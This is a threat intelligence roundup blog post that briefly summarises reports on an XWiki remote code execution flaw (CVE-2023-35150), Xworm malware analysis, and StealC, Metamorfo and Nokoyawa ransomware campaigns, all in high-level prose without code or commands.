web analytics

Threat Intel Roundup: XWiki, cl0p, HTML Sumggling

XWiki Remote Code Execution (CVE-2023-35150)

The XWiki vulnerability (CVE-2023-35150) involves improper input validation within the “Invitation Application.” Authenticated attackers can exploit this flaw by manipulating requests, leading to arbitrary code execution. XWiki’s scripting feature, used to create web applications, includes an “Invitation Application” facilitating email notifications for user registration. The vulnerability arises when unvalidated user data renders a link based on unsanitized request-URIs. Successful exploitation allows an attacker to execute arbitrary code.

Malware Analysis and Dynamic Extraction of Xworm Payload

In this analysis, a Golang file is examined, dynamically extracting an Xworm payload. Techniques such as Procmon, Process Hacker, Entropy Analysis, and Debuggers are used. The 1.5GB Golang file is debloated using “pe-debloat” tool, reducing its size to 960KB. Process monitoring reveals the malware’s activities, including scheduled tasks, library loading, and code execution. The loaded .NET assemblies are scrutinized using Dnspy, revealing capabilities such as
keylogging and system enumeration. Decoding encrypted configuration yields insight into Xworm malware’s intent.

Threat Analysis Report – StealC Malware Campaign via “Request Booking” Spam Email

This report delves into a malware campaign using “Request Booking” spam emails to spread the StealC malware. It covers the payload, URLs, and C2 server. The spam email prompts victims to download a password-protected ZIP file containing a malicious .cmd script. Upon execution, the script downloads a PowerShell script from GitHub, initiating malware infection. The report details the infection chain and offers detection guidance for the campaign’s artifacts.

Threat Analysis Report – Metamorfo (Casbaneiro) Campaign Targeting Mexico

This analysis focuses on a Metamorfo (Casbaneiro) campaign targeting Mexico. It outlines the attack’s execution chain, from phishing to payload execution. Victims are lured to a URL, leading to a .rar file and a series of scripts. AutoIT and other techniques are exploited for persistence, eventually leading to the execution of Metamorfo DLLs. The report provides insights into the attacker’s tactics and detection suggestions.

Incident Analysis Report – Nokoyawa Ransomware Campaign with HTML Smuggling and Rapid Execution

This incident analysis report examines a Nokoyawa ransomware campaign utilizing HTML smuggling for domain-wide ransomware deployment. The attack chain involves Excel macro and IcedID malware, with Nokoyawa ransomware executed within 12 hours of initial compromise. The report details the intrusion timeline, attacker actions, lateral movement, and the ransomware’s execution. The rapid progression from compromise to ransomware highlights the threat’s sophistication.


advisor pick´S post